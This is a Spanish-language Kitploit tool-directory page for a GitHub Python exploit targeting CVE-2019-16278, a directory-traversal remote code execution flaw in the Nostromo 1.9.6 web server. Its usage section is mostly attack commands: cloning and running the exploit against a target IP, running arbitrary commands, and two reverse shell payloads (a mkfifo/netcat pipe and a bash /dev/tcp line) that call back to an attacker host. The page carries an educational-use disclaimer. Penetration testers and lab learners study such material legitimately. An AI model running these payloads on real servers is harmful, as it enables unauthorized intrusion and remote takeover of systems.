Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution — Un atacante no autenticado puede forzar que el servidor apunte a un archivo shell como ‘/bin/sh’ y ejecutar comandos arbitrarios debido a la falla en la verificación de la URL, lo que conduce a un path traversal a cualquier archivo que exista en el sistema. Las versiones de Nostromo, como la 1.9.6, no verifican esta URL. | Kitploit
Herramientas/GitHubGitHub/cybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubcybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution

CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Un atacante no autenticado puede forzar que el servidor apunte a un archivo shell como ‘/bin/sh’ y ejecutar comandos arbitrarios debido a la falla en la verificación de la URL, lo que conduce a un path traversal a cualquier archivo que exista en el sistema. Las versiones de Nostromo, como la 1.9.6, no verifican esta URL.

Compartir

POC

Repositorio: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git

📜 Descripción

Este repositorio contiene un exploit en Python para CVE-2019-16278, una vulnerabilidad en Nostromo 1.9.6 (un servidor web). La vulnerabilidad permite la Ejecución Remota de Código (RCE) aprovechando un directory traversal para ejecutar comandos arbitrarios en el sistema objetivo.

🚀 Características

  • Ejecutar comandos de shell personalizados en el objetivo vulnerable.
  • Soporte para payloads de reverse shell.
  • Capacidad para personalizar el tamaño de la respuesta del objetivo.

🛠️ Requisitos

  • Python 3.x
  • Una máquina ejecutando Nostromo 1.9.6 (el objetivo vulnerable).
  • Netcat (nc) para capturar reverse shells.

⚙️ Uso

Paso 1: Clonar el Repositorio

root@kitploit:~
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

Paso 2: Ejecutar el Exploit

root@kitploit:~
python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]

Argumentos:

ArgumentoDescripciónRequeridoPor defecto
-t, --targetLa dirección IP del objetivoSíNinguno
-p, --portEl puerto del objetivoSíNinguno
-c, --commandEl comando a ejecutar en el servidorSíNinguno
-b, --bytesNúmero de bytes a leer en la respuestaNo4096

🧑‍💻 Ejemplos

Ejemplo 1: Ejecutar whoami en el Objetivo

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"

Ejemplo 2: Reverse Shell con Netcat

Paso 1: Iniciar un listener de Netcat en tu máquina atacante:

root@kitploit:~
nc -lvnp 443

Paso 2: Ejecutar el exploit con un payload de reverse shell:

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"

Ejemplo 3: Reverse Shell usando /dev/tcp

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"

🔍 Detalles de la Vulnerabilidad

  • CVE: CVE-2019-16278
  • Software afectado: Servidor Web Nostromo 1.9.6
  • Tipo: Directory Traversal -> Ejecución Remota de Código

⚠️ Aviso Legal

Esta herramienta está destinada únicamente para fines educativos. No la uses en sistemas que no poseas o para los cuales no tengas permiso explícito de prueba. El acceso no autorizado a sistemas es ilegal. Úsala de manera responsable.

Descargar herramienta